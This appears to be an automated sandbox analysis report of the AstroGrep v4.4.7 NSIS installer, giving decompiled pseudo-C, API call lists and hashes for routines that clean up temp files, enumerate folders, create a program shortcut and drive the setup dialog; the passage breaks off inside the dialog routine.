                                                                                                            0x00405eef
                                                                                                            0x00405eef
                                                                                                            0x00000000
                                                                                                            0x00405eef
                                                                                                            0x00405eda
                                                                                                            0x00405ee5
                                                                                                            0x00405eeb
                                                                                                            0x00405eed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405eed
                                                                                                            0x00405ea6
                                                                                                            0x00405ea9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405eb8
                                                                                                            0x00405eba
                                                                                                            0x00405ebc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ebc
                                                                                                            0x00000000
                                                                                                            0x00405ef2
                                                                                                            0x00405e7d
                                                                                                            0x00000000
                                                                                                            0x00405e3b
                                                                                                            0x00405e40
                                                                                                            0x00405e56
                                                                                                            0x00405e5b
                                                                                                            0x00405e5e
                                                                                                            0x00405efb
                                                                                                            0x00405efb
                                                                                                            0x00405eff
                                                                                                            0x00405f07
                                                                                                            0x00405f07
                                                                                                            0x00000000
                                                                                                            0x00405eff
                                                                                                            0x00405e68
                                                                                                            0x00405ef6
                                                                                                            0x00405ef6
                                                                                                            0x00405ef9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ef9
                                                                                                            0x00405e39
                                                                                                            0x00405e0c
                                                                                                            0x00405e10
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e12
                                                                                                            0x00405e16
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e18
                                                                                                            0x00405e1c
                                                                                                            0x00000000
                                                                                                            0x00405e1e
                                                                                                            0x00405e1e
                                                                                                            0x00000000
                                                                                                            0x00405e1e
                                                                                                            0x00405e1c
                                                                                                            0x00405f81
                                                                                                            0x00405f8b
                                                                                                            0x00405f97
                                                                                                            0x00405f97
                                                                                                            0x00000000

APIs
• GetVersion.KERNEL32(?,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,00404F80,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000), ref: 00405E02
• GetSystemDirectoryA.KERNEL32 ref: 00405E7D
• GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405E90
• SHGetSpecialFolderLocation.SHELL32(?,0075D8B4), ref: 00405ECC
• SHGetPathFromIDListA.SHELL32(0075D8B4,Remove folder: ), ref: 00405EDA
• CoTaskMemFree.OLE32(0075D8B4), ref: 00405EE5
• lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
• lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,00404F80,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000), ref: 00405F59
Strings
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-4188652698
• Opcode ID: ffbee074652d6b8252cab1eafdb2ae41c9dfe99060cc35530cbd757453430961
• Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
• Opcode Fuzzy Hash: ffbee074652d6b8252cab1eafdb2ae41c9dfe99060cc35530cbd757453430961
• Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
Uniqueness

Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E004055D1(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				void* _v12;
                                                                                                            				signed int _v16;
                                                                                                            				struct _WIN32_FIND_DATAA _v336;
                                                                                                            				signed int _t40;
                                                                                                            				char* _t53;
                                                                                                            				signed int _t55;
                                                                                                            				signed int _t58;
                                                                                                            				signed int _t64;
                                                                                                            				signed int _t66;
                                                                                                            				void* _t68;
                                                                                                            				signed char _t69;
                                                                                                            				CHAR* _t71;
                                                                                                            				void* _t72;
                                                                                                            				CHAR* _t73;
                                                                                                            				char* _t76;
                                                                                                            
                                                                                                            				_t69 = _a8;
                                                                                                            				_t73 = _a4;
                                                                                                            				_v8 = _t69 & 0x00000004;
                                                                                                            				_t40 = E0040588F(__eflags, _t73);
                                                                                                            				_v16 = _t40;
                                                                                                            				if((_t69 & 0x00000008) != 0) {
                                                                                                            					_t66 = DeleteFileA(_t73); // executed
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					_t68 =  ~_t66 + 1;
                                                                                                            					 *0x42e488 =  *0x42e488 + _t68;
                                                                                                            					return _t68;
                                                                                                            				}
                                                                                                            				_a4 = _t69;
                                                                                                            				_t8 =  &_a4;
                                                                                                            				 *_t8 = _a4 & 0x00000001;
                                                                                                            				__eflags =  *_t8;
                                                                                                            				if( *_t8 == 0) {
                                                                                                            					L5:
                                                                                                            					E00405D2F(0x42a870, _t73);
                                                                                                            					__eflags = _a4;
                                                                                                            					if(_a4 == 0) {
                                                                                                            						E004057E8(_t73);
                                                                                                            					} else {
                                                                                                            						lstrcatA(0x42a870, "\*.*");
                                                                                                            					}
                                                                                                            					__eflags =  *_t73;
                                                                                                            					if( *_t73 != 0) {
                                                                                                            						L10:
                                                                                                            						lstrcatA(_t73, 0x409014);
                                                                                                            						L11:
                                                                                                            						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
                                                                                                            						_t40 = FindFirstFileA(0x42a870,  &_v336); // executed
                                                                                                            						__eflags = _t40 - 0xffffffff;
                                                                                                            						_v12 = _t40;
                                                                                                            						if(_t40 == 0xffffffff) {
                                                                                                            							L29:
                                                                                                            							__eflags = _a4;
                                                                                                            							if(_a4 != 0) {
                                                                                                            								_t32 = _t71 - 1;
                                                                                                            								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                                            								__eflags =  *_t32;
                                                                                                            							}
                                                                                                            							goto L31;
                                                                                                            						} else {
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L12:
                                                                                                            							_t76 =  &(_v336.cFileName);
                                                                                                            							_t53 = E004057CC( &(_v336.cFileName), 0x3f);
                                                                                                            							__eflags =  *_t53;
                                                                                                            							if( *_t53 != 0) {
                                                                                                            								__eflags = _v336.cAlternateFileName;
                                                                                                            								if(_v336.cAlternateFileName != 0) {
                                                                                                            									_t76 =  &(_v336.cAlternateFileName);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							__eflags =  *_t76 - 0x2e;
                                                                                                            							if( *_t76 != 0x2e) {
                                                                                                            								L19:
                                                                                                            								E00405D2F(_t71, _t76);
                                                                                                            								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									_t55 = E00405589(__eflags, _t73, _v8);
                                                                                                            									__eflags = _t55;
                                                                                                            									if(_t55 != 0) {
                                                                                                            										E00404F48(0xfffffff2, _t73);
                                                                                                            									} else {
                                                                                                            										__eflags = _v8 - _t55;
                                                                                                            										if(_v8 == _t55) {
                                                                                                            											 *0x42e488 =  *0x42e488 + 1;
                                                                                                            										} else {
                                                                                                            											E00404F48(0xfffffff1, _t73);
                                                                                                            											E00405BEA(_t72, _t73, 0);
                                                                                                            										}
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										E004055D1(__eflags, _t73, _a8);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L27;
                                                                                                            							}
                                                                                                            							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                                            							__eflags = _t64;
                                                                                                            							if(_t64 == 0) {
                                                                                                            								goto L27;
                                                                                                            							}
                                                                                                            							__eflags = _t64 - 0x2e;
                                                                                                            							if(_t64 != 0x2e) {
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            							__eflags =  *((char*)(_t76 + 2));
                                                                                                            							if( *((char*)(_t76 + 2)) == 0) {
                                                                                                            								goto L27;
                                                                                                            							}
                                                                                                            							goto L19;
                                                                                                            							L27:
                                                                                                            							_t58 = FindNextFileA(_v12,  &_v336); // executed
                                                                                                            							__eflags = _t58;
                                                                                                            						} while (_t58 != 0);
                                                                                                            						_t40 = FindClose(_v12);
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					__eflags =  *0x42a870 - 0x5c;
                                                                                                            					if( *0x42a870 != 0x5c) {
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            					goto L10;
                                                                                                            				} else {
                                                                                                            					__eflags = _t40;
                                                                                                            					if(_t40 == 0) {
                                                                                                            						L31:
                                                                                                            						__eflags = _a4;
                                                                                                            						if(_a4 == 0) {
                                                                                                            							L39:
                                                                                                            							return _t40;
                                                                                                            						}
                                                                                                            						__eflags = _v16;
                                                                                                            						if(_v16 != 0) {
                                                                                                            							_t40 = E00406033(_t73);
                                                                                                            							__eflags = _t40;
                                                                                                            							if(_t40 == 0) {
                                                                                                            								goto L39;
                                                                                                            							}
                                                                                                            							E004057A1(_t73);
                                                                                                            							_t40 = E00405589(__eflags, _t73, _v8 | 0x00000001);
                                                                                                            							__eflags = _t40;
                                                                                                            							if(_t40 != 0) {
                                                                                                            								return E00404F48(0xffffffe5, _t73);
                                                                                                            							}
                                                                                                            							__eflags = _v8;
                                                                                                            							if(_v8 == 0) {
                                                                                                            								goto L33;
                                                                                                            							}
                                                                                                            							E00404F48(0xfffffff1, _t73);
                                                                                                            							return E00405BEA(_t72, _t73, 0);
                                                                                                            						}
                                                                                                            						L33:
                                                                                                            						 *0x42e488 =  *0x42e488 + 1;
                                                                                                            						return _t40;
                                                                                                            					}
                                                                                                            					__eflags = _t69 & 0x00000002;
                                                                                                            					if((_t69 & 0x00000002) == 0) {
                                                                                                            						goto L31;
                                                                                                            					}
                                                                                                            					goto L5;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNELBASE(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                            • lstrcatA.KERNEL32(?,00409014,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                            • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*$\*.*
                                                                                                            • API String ID: 2035342205-2356523465
                                                                                                            • Opcode ID: 76f0cf5bfb1f51320b672cd4c332f5cb7a228c538b92ebc2b22e9cd978c5504d
                                                                                                            • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                                            • Opcode Fuzzy Hash: 76f0cf5bfb1f51320b672cd4c332f5cb7a228c538b92ebc2b22e9cd978c5504d
                                                                                                            • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

C-Code - Quality: 74%
E0040205E() {
	signed int _t55;
	void* _t59;
	intOrPtr* _t63;
	intOrPtr _t64;
	intOrPtr* _t65;
	intOrPtr* _t67;
	intOrPtr* _t69;
	intOrPtr* _t71;
	intOrPtr* _t73;
	intOrPtr* _t75;
	intOrPtr* _t78;
	intOrPtr* _t80;
	intOrPtr* _t82;
	intOrPtr* _t84;
	int _t87;
	intOrPtr* _t95;
	signed int _t105;
	signed int _t109;
	void* _t111;

	 *(_t111 - 0x34) = E00402A3A(0xfffffff0);
	 *(_t111 - 0xc) = E00402A3A(0xffffffdf);
	 *((intOrPtr*)(_t111 - 0x4c)) = E00402A3A(2);
	 *((intOrPtr*)(_t111 - 0x40)) = E00402A3A(0xffffffcd);
	 *((intOrPtr*)(_t111 - 0x38)) = E00402A3A(0x45);
	_t55 =  *(_t111 - 0x18);
	 *(_t111 - 0x44) = _t55 & 0x00000fff;
	_t105 = _t55 & 0x00008000;
	_t109 = _t55 >> 0x0000000c & 0x00000007;
	 *(_t111 - 0x3c) = _t55 >> 0x00000010 & 0x0000ffff;
	if(E0040580E( *(_t111 - 0xc)) == 0) {
		E00402A3A(0x21);
	}
	_t59 = _t111 + 8;
	__imp__CoCreateInstance(0x407514, _t87, 1, 0x407504, _t59); // executed
	if(_t59 < _t87) {
		L15:
		 *((intOrPtr*)(_t111 - 4)) = 1;
		_push(0xfffffff0);
	} else {
		_t63 =  *((intOrPtr*)(_t111 + 8));
		_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x407524, _t111 - 0x30);
		 *((intOrPtr*)(_t111 - 8)) = _t64;
		if(_t64 >= _t87) {
			_t67 =  *((intOrPtr*)(_t111 + 8));
			 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
			if(_t105 == _t87) {
				_t84 =  *((intOrPtr*)(_t111 + 8));
				 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Program Files (x86)\\AstroGrep");
			}
			if(_t109 != _t87) {
				_t82 =  *((intOrPtr*)(_t111 + 8));
				 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
			}
			_t69 =  *((intOrPtr*)(_t111 + 8));
			 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x3c));
			_t95 =  *((intOrPtr*)(_t111 - 0x40));
			if( *_t95 != _t87) {
				_t80 =  *((intOrPtr*)(_t111 + 8));
				 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x44));
			}
			_t71 =  *((intOrPtr*)(_t111 + 8));
			 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x4c)));
			_t73 =  *((intOrPtr*)(_t111 + 8));
			 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x38)));
			if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
				 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
				if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x34), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
					_t78 =  *((intOrPtr*)(_t111 - 0x30));
					 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
				}
			}
			_t75 =  *((intOrPtr*)(_t111 - 0x30));
			 *((intOrPtr*)( *_t75 + 8))(_t75);
		}
		_t65 =  *((intOrPtr*)(_t111 + 8));
		 *((intOrPtr*)( *_t65 + 8))(_t65);
		if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
			_push(0xfffffff4);
		} else {
			goto L15;
		}
	}
	E00401423();
	 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t111 - 4));
	return 0;
}

Instruction addresses: 0x00402067, 0x00402071, 0x0040207b, 0x00402085, 0x00402090, 0x00402093, 0x004020ad, 0x004020b0, 0x004020b6, 0x004020b9, 0x004020c3, 0x004020c7, 0x004020c7, 0x004020cc, 0x004020dd, 0x004020e5, 0x004021bb, 0x004021bb, 0x004021c2, 0x004020eb, 0x004020eb, 0x004020fa, 0x004020fe, 0x00402101, 0x00402107, 0x00402115, 0x00402118, 0x0040211a, 0x00402125, 0x00402125, 0x0040212a, 0x0040212c, 0x00402133, 0x00402133, 0x00402136, 0x0040213f, 0x00402142, 0x00402147, 0x00402149, 0x00402153, 0x00402153, 0x00402156, 0x0040215f, 0x00402162, 0x0040216b, 0x00402171, 0x00402178, 0x00402191, 0x00402193, 0x004021a1, 0x004021a1, 0x00402191, 0x004021a4, 0x004021aa, 0x004021aa, 0x004021ad, 0x004021b3, 0x004021b9, 0x004021ce, 0x00000000, 0x00000000, 0x00000000, 0x004021b9, 0x004021c4, 0x004028d2, 0x004028de

APIs
• CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
Strings
• C:\Program Files (x86)\AstroGrep, xrefs: 0040211D
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID: C:\Program Files (x86)\AstroGrep
• API String ID: 123533781-2344716657
• Opcode ID: 2dc2b96a66f57c24b750db45e5506c73cf51cde49f126d2de88fdbea151c2965
• Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
• Opcode Fuzzy Hash: 2dc2b96a66f57c24b750db45e5506c73cf51cde49f126d2de88fdbea151c2965
• Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406033(CHAR* _a4) {
	void* _t2;

	_t2 = FindFirstFileA(_a4, 0x42b0b8); // executed
	if(_t2 == 0xffffffff) {
		return 0;
	}
	FindClose(_t2); // executed
	return 0x42b0b8;
}

Instruction addresses: 0x0040603e, 0x00406047, 0x00000000, 0x00406054, 0x0040604a, 0x00000000

APIs
• FindFirstFileA.KERNELBASE(74B5FA90,0042B0B8,C:\,004058D2,C:\,C:\,00000000,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
• FindClose.KERNELBASE(00000000), ref: 0040604A
Strings
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: Find$CloseFileFirst
• String ID: C:\
• API String ID: 2295610775-3404278061
• Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
• Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
• Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
• Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
Uniqueness

Uniqueness Score: -1.00%
                                                                                                            C-Code - Quality: 41%
E00402688(char __ebx, char* __edi, char* __esi) {
	void* _t6;
	void* _t19;

	_t6 = FindFirstFileA(E00402A3A(2), _t19 - 0x1a4); // executed
	if(_t6 != 0xffffffff) {
		E00405C8D(__edi, _t6);
		_push(_t19 - 0x178);
		_push(__esi);
		E00405D2F();
	} else {
		 *__edi = __ebx;
		 *__esi = __ebx;
		 *((intOrPtr*)(_t19 - 4)) = 1;
	}
	 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t19 - 4));
	return 0;
}

Instruction addresses: 0x00402697, 0x004026a0, 0x004026b4, 0x004026bf, 0x004026c0, 0x004027f5, 0x004026a2, 0x004026a2, 0x004026a4, 0x004026a6, 0x004026a6, 0x004028d2, 0x004028de

APIs
• FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402697
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: bfc32a980be8afd774be7d36f6a04d6cd6616e565dcef0ba011c71aa6fcb6649
• Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
• Opcode Fuzzy Hash: bfc32a980be8afd774be7d36f6a04d6cd6616e565dcef0ba011c71aa6fcb6649
• Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 84%
                                                                                                            			E00403A41(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                            				struct HWND__* _v32;
                                                                                                            				void* _v84;
                                                                                                            				void* _v88;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t35;
                                                                                                            				signed int _t37;
                                                                                                            				void* _t39;
                                                                                                            				struct HWND__* _t49;
                                                                                                            				signed int _t67;
                                                                                                            				struct HWND__* _t73;
                                                                                                            				signed int _t86;
                                                                                                            				struct HWND__* _t91;
                                                                                                            				signed int _t99;
                                                                                                            				int _t103;
                                                                                                            				signed int _t115;
                                                                                                            				signed int _t116;
                                                                                                            				int _t117;
                                                                                                            				signed int _t122;
                                                                                                            				struct HWND__* _t125;
                                                                                                            				struct HWND__* _t126;
                                                                                                            				int _t127;
                                                                                                            				long _t130;
                                                                                                            				int _t132;
                                                                                                            				int _t133;
                                                                                                            				void* _t134;
                                                                                                            				void* _t141;
                                                                                                            				void* _t142;
                                                                                                            
                                                                                                            				_t115 = _a8;
                                                                                                            				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                                            					_t35 = _a12;
                                                                                                            					_t125 = _a4;
                                                                                                            					__eflags = _t115 - 0x110;
                                                                                                            					 *0x429850 = _t35;
                                                                                                            					if(_t115 == 0x110) {
                                                                                                            						 *0x42e408 = _t125;
                                                                                                            						 *0x429864 = GetDlgItem(_t125, 1);
                                                                                                            						_t91 = GetDlgItem(_t125, 2);
                                                                                                            						_push(0xffffffff);
                                                                                                            						_push(0x1c);
                                                                                                            						 *0x428830 = _t91;
                                                                                                            						E00403F14(_t125);
                                                                                                            						SetClassLongA(_t125, 0xfffffff2,  *0x42dbe8); // executed
                                                                                                            						 *0x42dbcc = E0040140B(4);
                                                                                                            						_t35 = 1;
                                                                                                            						__eflags = 1;
                                                                                                            						 *0x429850 = 1;
                                                                                                            					}
                                                                                                            					_t122 = "\t"; // 0x9
                                                                                                            					_t133 = 0;
                                                                                                            					_t130 = (_t122 << 6) +  *0x42e420;
                                                                                                            					__eflags = _t122;
                                                                                                            					if(_t122 < 0) {
                                                                                                            						L34:
                                                                                                            						E00403F60(0x40b);
                                                                                                            						while(1) {
                                                                                                            							_t37 =  *0x429850; // 0x1
                                                                                                            							"\t" = "\t" + _t37;
                                                                                                            							_t130 = _t130 + (_t37 << 6);
                                                                                                            							_t39 = "\t"; // 0x9
                                                                                                            							__eflags = _t39 -  *0x42e424;
                                                                                                            							if(_t39 ==  *0x42e424) {
                                                                                                            								E0040140B(1);
                                                                                                            							}
                                                                                                            							__eflags =  *0x42dbcc - _t133; // 0x0
                                                                                                            							if(__eflags != 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							__eflags = "\t" -  *0x42e424; // 0x9
                                                                                                            							if(__eflags >= 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t116 =  *(_t130 + 0x14);
                                                                                                            							E00405D51(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                                            							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                                            							_push(0xfffffc19);
                                                                                                            							E00403F14(_t125);
                                                                                                            							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                                            							_push(0xfffffc1b);
                                                                                                            							E00403F14(_t125);
                                                                                                            							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                                            							_push(0xfffffc1a);
                                                                                                            							E00403F14(_t125);
                                                                                                            							_t49 = GetDlgItem(_t125, 3);
                                                                                                            							__eflags =  *0x42e48c - _t133;
                                                                                                            							_v32 = _t49;
                                                                                                            							if( *0x42e48c != _t133) {
                                                                                                            								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                                            								__eflags = _t116;
                                                                                                            							}
                                                                                                            							ShowWindow(_t49, _t116 & 0x00000008); // executed
                                                                                                            							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
                                                                                                            							E00403F36(_t116 & 0x00000002);
                                                                                                            							_t117 = _t116 & 0x00000004;
                                                                                                            							EnableWindow( *0x428830, _t117); // executed
                                                                                                            							__eflags = _t117 - _t133;
                                                                                                            							if(_t117 == _t133) {
                                                                                                            								_push(1);
                                                                                                            							} else {
                                                                                                            								_push(_t133);
                                                                                                            							}
                                                                                                            							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                                            							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                                            							__eflags =  *0x42e48c - _t133;
                                                                                                            							if( *0x42e48c == _t133) {
                                                                                                            								_push( *0x429864);
                                                                                                            							} else {
                                                                                                            								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                                            								_push( *0x428830);
                                                                                                            							}
                                                                                                            							E00403F49();
                                                                                                            							E00405D2F(0x429868, "AstroGrep v4.4.7 Setup");
                                                                                                            							E00405D51(0x429868, _t125, _t130,  &(0x429868[lstrlenA(0x429868)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                                            							SetWindowTextA(_t125, 0x429868); // executed
                                                                                                            							_push(_t133);
                                                                                                            							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                                            							__eflags = _t67;
                                                                                                            							if(_t67 != 0) {
                                                                                                            								continue;
                                                                                                            							} else {
                                                                                                            								__eflags =  *_t130 - _t133;
                                                                                                            								if( *_t130 == _t133) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t130 + 4) - 5;
                                                                                                            								if( *(_t130 + 4) != 5) {
                                                                                                            									DestroyWindow( *0x42dbd8); // executed
                                                                                                            									 *0x429040 = _t130;
                                                                                                            									__eflags =  *_t130 - _t133;
                                                                                                            									if( *_t130 <= _t133) {
                                                                                                            										goto L58;
                                                                                                            									}
